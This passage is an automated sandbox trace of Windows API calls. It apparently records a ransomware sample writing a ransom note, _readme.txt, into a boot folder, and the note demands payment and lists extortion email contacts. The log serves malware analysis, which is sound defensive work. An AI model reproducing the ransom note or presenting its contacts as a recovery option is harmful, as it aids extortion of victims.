HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.839] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2d70 | out: hHeap=0x4970000) returned 1 [0127.839] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d70 [0127.839] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.839] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0127.839] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.839] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.839] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2d70 | out: hHeap=0x4970000) returned 1 [0127.839] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d70 [0127.839] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.839] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.839] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2d70 | out: hHeap=0x4970000) returned 1 [0127.839] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d70 [0127.839] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.839] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.839] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2d70 | out: hHeap=0x4970000) returned 1 [0127.839] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2d28 | out: hHeap=0x4970000) returned 1 [0127.839] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9048 [0127.839] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0127.839] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.839] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.839] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.839] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.839] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9048 | out: hHeap=0x4970000) returned 1 [0127.839] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9048 [0127.839] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0127.839] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.839] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.839] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.839] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.840] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.840] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.840] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.840] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.840] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.840] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.840] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.840] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.840] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.840] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.840] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.840] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8bc0 | out: hHeap=0x4970000) returned 1 [0127.840] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.840] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.840] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0127.840] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0127.840] PathFindFileNameW (pszPath="") returned="" [0127.840] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce8bc0 [0127.840] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0127.841] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0127.841] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0127.842] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0127.842] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0127.842] PathFindFileNameW (pszPath="C:\\Boot\\cs-CZ\\") returned="cs-CZ\\" [0127.842] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0127.842] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0127.842] PathFindFileNameW (pszPath="") returned="" [0127.842] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0127.842] PathAppendW (in: pszPath="C:\\Boot\\cs-CZ\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 1 [0127.842] PathFileExistsW (pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 0 [0127.849] lstrcpyW (in: lpString1=0xdd2c688, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki" [0127.849] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhki", lpString2="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH" [0127.849] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd3390 [0127.849] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\_readme.txt" (normalized: "c:\\boot\\cs-cz\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c4 [0127.849] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8c0) returned 0x7516fe8 [0127.849] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x85c) returned 0x49db7d8 [0127.849] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", cchWideChar=-1, lpMultiByteStr=0x49db7d8, cbMultiByte=2140, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", lpUsedDefaultChar=0x0) returned 1117 [0127.849] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x49dc040 [0127.850] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49db7d8 | out: hHeap=0x4970000) returned 1 [0127.850] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.850] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH") returned 1116 [0127.850] WriteFile (in: hFile=0x5c4, lpBuffer=0x49dc040*, nNumberOfBytesToWrite=0x45c, lpNumberOfBytesWritten=0xe00fb64, lpOverlapped=0x0 | out: lpBuffer=0x49dc040*, lpNumberOfBytesWritten=0xe00fb64*=0x45c, lpOverlapped=0x0) returned 1 [0127.851] CloseHandle (hObject=0x5c4) returned 1 [0127.851] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49dc040 | out: hHeap=0x4970000) returned 1 [0127.851] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd3390 | out: hHeap=0x4970000) returned 1 [0127.851] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2c688 | out: hHeap=0x4970000) returned 1 [0127.851] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.851] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.851] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe36ef840, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe36ef840, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x49a4880 [0127.851] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.851] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe36ef840, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe36ef840, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0127.851] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0127.851] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe36ef840, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe36ef840, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe36ef840, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0127.851] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe36ef840, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe36ef840, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe36ef840, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0127.851] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0127.851] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.851] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce92c8 | out: hHeap=0x4970000) returned 1 [0127.851] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce92c8 [0127.852] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0127.852] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.852] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.852] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.852] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.852] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.852] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.852] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.852] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.852] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.852] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.852] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.852] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.852] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.852] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.852] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.852] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.852] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.852] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2b08 [0127.852] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.852] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.852] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.852] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0127.852] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.852] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.852] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.852] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.852] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0127.852] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.852] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.852] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.852] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.852] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.853] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.853] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.853] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.853] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0127.853] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.853] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.853] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.853] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.853] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.853] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.853] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.853] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.853] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.853] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.853] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.853] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.853] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.853] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.853] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.853] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0127.853] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.853] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce85d0 | out: hHeap=0x4970000) returned 1 [0127.853] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce85d0 [0127.853] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2b08 [0127.853] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.853] HeapFree (in: hHeap=0x4970000, 